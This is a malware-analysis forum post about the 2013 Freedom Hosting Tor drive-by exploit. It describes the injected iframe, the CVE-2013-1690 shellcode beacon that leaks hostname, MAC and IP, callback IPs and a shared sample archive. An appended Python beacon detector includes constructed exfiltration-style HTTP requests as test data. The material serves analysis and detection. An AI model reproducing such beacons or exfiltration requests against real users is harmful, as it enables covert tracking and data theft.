A forum for reverse engineering, OS internals and malware analysis 

 #23603  by unixfreaxjp
 Wed Aug 13, 2014 1:25 pm
Background:

This is purely a case of state-sponsored malware; a search warrant was backing up the domain name spotted to be infected.
The infection ran in Onionland on the Freedom Hosting website(s) in 2013, with the purpose of targeting child porn suspects by the method of mass drive-by download. The court documentation was spotted recently in 2014, legitimating the usage of the mass-infection technique for the purpose of search (investigation details) by a regular search warrant signed by the district court of Nebraska, US.

Details of malware, its distribution & purpose:

1. These are the variants of code implemented to infect, injected in some pages of the Freedom Hosting site: the malicious JavaScript iframer, with the condition aimed at Firefox (browser) and Windows NT (OS); note the cookie method used and the callback.
http://pastebin.com/bu2Ya0n6

2. One of the above codes redirects the visitor to the specific .onion "infector" site stated in point (1) above, using malicious obfuscated JavaScript to exploit the (at that time) vulnerable version of Firefox with the 0day CVE-2013-1690 in order to infect the payload (a shellcode) to , while one of the codes was sending a beacon for the infection initiation to:
Code:
  IP Address: 65.222.202.53
  City: Triadelphia
  State or Region: West Virginia
  Country: United States
  ISP: Verizon Business
  Latitude & Longitude: 40.0900-80.6220
  Domain: verizonbusiness.com
  ZIP Code: 26059
The infector script, with some deobfuscation we researched, is here: http://pastebin.com/RTwsyrH8

3. The above obfuscated JavaScript (2) was exploiting the Firefox 0day (of that time) to gain arbitrary permission to execute malicious shellcode (under a Win x32 environment) to perform the malicious verdict as per the following details; here is the analysis of the shellcode using radare, as snipped in the picture below.
[image: radare analysis of the shellcode]
The 0day exploitation can be viewed in the references below and is not a subject to be discussed here:
https://cve.mitre.org/cgi-bin/cvename.c ... -2013-1690
https://bugzilla.mozilla.org/show_bug.cgi?id=901365
https://www.mozilla.org/security/announ ... 13-53.html
The shellcode analysis can be viewed here: http://pastebin.com/aFUP2gLB, followed by the behavior test to confirm the reversed information, to avoid a false positive in the verdict.

4. With the methods of (1) crafting the shellcode into an EXE and running it, and (2) simulating the infection with the Firefox Tor Bundle, we could positively reproduce the CNC callback, as per the snapshot below:
[image: snapshot of the reproduced CNC callback]
It also calls the neighbor IP of the callback IP stated above, on the ghost network of:
Code:
  65.222.202.54 ASN: 701 / UUNET
  Prefix: 65.192.0.0/11
  Vienna, Virginia, United States, North America
  38.9012,-77.2653 Verizon Business
5. The malicious activity verdict:
The malicious hidden IFRAME redirector driven by JavaScript, which is implemented in some pages under the Freedom Hosting site in the Tor network (on the same server as TorMail), is redirecting users matching the criteria of Windows OS and Firefox browser to the callback IP or a specific .onion domain for the 0day exploit (CVE-2013-1690) and executing shellcode as the payload. The shellcode sends an HTTP/1.1 GET request containing a specific URL, with the TCP/IP packet that contains the IP address and MAC address of the infected PC. The MAC address, which was grabbed by SendARP@IPHLPAPI.DLL, and the hostname of the infected PC, grabbed by gethostbyname@WS2_32.DLL and gethostname@WS2_32.DLL in the shellcode, are sensitive unique information which would need consent from the user before being sent to the remote environment, yet were sent.
The cookie was installed in the PCs accessing the Freedom Hosting sites, to be used for the tracking scheme to match the redirected user status; it was installed in PCs that matched the criteria described in point (1).

6. The privacy violation verdict:
After the thorough investigation performed, beyond any doubt we confirmed that sensitive information (READ: PRIVACY) of multinational users can be violated by the implementation of this malware for legal investigation; in this specific case we can confirm the following violation points:
(1) Silently sending the infected PC hostname,
(2) Silently sending the MAC address (attached to the TCP packet) and ARP,
(3) The IP address is sent to this remote host ...without proper mention,
(4) The cookie which was silently installed in the infected PC can be used for tracking purposes.

7. Sample
The payload is the shellcode binary (hex file); we uploaded it to VT here:
VT: https://www.virustotal.com/en/file/7441 ... 380104138/
With a detection ratio of 2/48; the file had been uploaded by another individual researcher we did not know beforehand, with the same hash.
To share with the members of KM, we uploaded the samples of the shellcode + crafted EXE samples.

8. The point of this report:
The point of this report is to clarify the real facts, for you to see and judge yourself, as fellow malware researchers, whether the usage of such mass-infecting malicious code can be allowed morally or not. Once we let it happen, this method will undoubtedly be re-used, over and over and over again, and encourage other countries to do the same too, opening the possibility that someday we may face a wild wild west internet in the future where good people, cops and crooks are all using malware to battle each other..
Malware is bad by default and by nature; it was built basically on the concept of infect-duplicate-steal-control-destroy victims, and is a subject to be avoided by the good fellow. There is no one country's law ever "enough" to allow the mass multinational infection of it, for whatever reason.
Due to this, we at MMD are protesting the usage of this malware, as posted here as the background information: http://blog.malwaremustdie.org/2014/08/ ... d-any.html

9. Reference:
https://www.documentcloud.org/documents ... davit.html
http://www.wired.com/2014/08/operation_torpedo/
http://reason.com/blog/2014/08/06/fbi-t ... -tor-users
http://www.wowt.com/home/headlines/Fed- ... 16621.html
http://www.wired.com/2013/08/freedom-hosting/
http://xerocrypt.wordpress.com/2013/08/ ... ghty-list/
https://www.virusbtn.com/blog/2013/08_05.xml
https://krebsonsecurity.com/2013/08/fir ... porn-hunt/
https://blog.torproject.org/blog/hidden ... om-hosting

Thank you for kindly reading this report. This is the work of a team effort, not an individual, and not only MMD.
I did the analysis of the shellcode parts (pastebin, point 3) and compiled the overall evidence.
There are so many references; I picked the closest to the source, using a strict filter, since the infection was realized in mid 2013 and some objects have been deleted from the internet.

What's bad is just bad, and malware is bad. Don't use it; there will always be more damage than good points.

Best regards

#MalwareMustDie - KernelMode rocks!
Attachments
RAR5, password: infected
Note: Sample is shared to KM community
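Point 5 of the report describes the beacon: an HTTP/1.1 GET to the callback IP carrying the infected PC's hostname, MAC address and IP. The following is an added example, written by the editor rather than by unixfreaxjp or MMD, showing how a defender would flag such identifier-leaking beacons in captured HTTP requests. The exact URL layout of the real beacon is not on the page, so the sample requests below are constructed, the query-parameter names are assumptions, and the only values taken from the report are the two callback IPs.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Callback addresses named in the report (points 2 and 4). A real deployment
# would load such indicators from a blocklist instead of hard-coding them.
CALLBACK_IPS = {"65.222.202.53", "65.222.202.54"}

# MAC address as six separated octets, or as twelve bare hex digits that are
# not part of a longer hex run (so hashes in URLs do not trigger it).
MAC_RE = re.compile(
    r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}[:\-]){5}[0-9A-Fa-f]{2}(?![0-9A-Fa-f])"
    r"|(?<![0-9A-Fa-f])[0-9A-Fa-f]{12}(?![0-9A-Fa-f])"
)
IPV4_RE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")
# Query keys the heuristic treats as carrying a machine name (assumed names).
HOSTNAME_KEYS = {"host", "hostname", "computer", "computername", "pc", "machine"}


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.1 request: request line, headers, optional body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)


def analyse(req: HttpRequest) -> List[str]:
    """Return short codes for every suspicious trait found in the request."""
    findings: List[str] = []
    host = req.headers.get("host", "").split(":")[0]
    if host in CALLBACK_IPS:
        findings.append("callback-ip")
    # Anything the shellcode could place in the request: path, query, body.
    haystack = req.target + "\n" + req.body
    if MAC_RE.search(haystack):
        findings.append("mac")
    for ip in IPV4_RE.findall(haystack):
        try:
            if ipaddress.ip_address(ip).is_private:
                findings.append("private-ip")
                break
        except ValueError:  # e.g. 999.1.1.1 is not an address
            pass
    query = parse_qs(urlsplit(req.target).query)
    if any(key.lower() in HOSTNAME_KEYS for key in query):
        findings.append("hostname-key")
    return findings


def detect_beacons(raw_requests: List[str]) -> List[Tuple[int, List[str]]]:
    """Alert on a known callback destination, or on two or more leaked identifiers."""
    alerts = []
    for index, raw in enumerate(raw_requests):
        findings = analyse(parse_request(raw))
        identifiers = [f for f in findings if f != "callback-ip"]
        if "callback-ip" in findings or len(identifiers) >= 2:
            alerts.append((index, findings))
    return alerts


# Constructed sample traffic: a beacon to the reported callback IP, a benign
# page fetch, and an exfiltration POST to an unrelated documentation address.
SAMPLE_REQUESTS = [
    "GET /05cea4de0c4b4f5f9c6b1b8f3e?hostname=WKS-7F3A2C&mac=00-0C-29-3E-1A-5B HTTP/1.1\r\n"
    "Host: 65.222.202.53\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nAccept: text/html\r\n\r\n",
    "POST /upload HTTP/1.1\r\nHost: 203.0.113.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "id=0a1b2c3d4e5f&ip=192.168.1.23",
]

if __name__ == "__main__":
    for index, findings in detect_beacons(SAMPLE_REQUESTS):
        print(f"request {index}: {', '.join(findings)}")
```

The destination match is the strong signal; the identifier heuristics are deliberately loose (a hostname-like query key alone is common on legitimate sites), which is why an alert needs either the known callback IP or at least two leaked identifiers. The report also notes that the IP and MAC travel in the TCP packet itself, so a network-level check on the raw packet would complement this HTTP-level view.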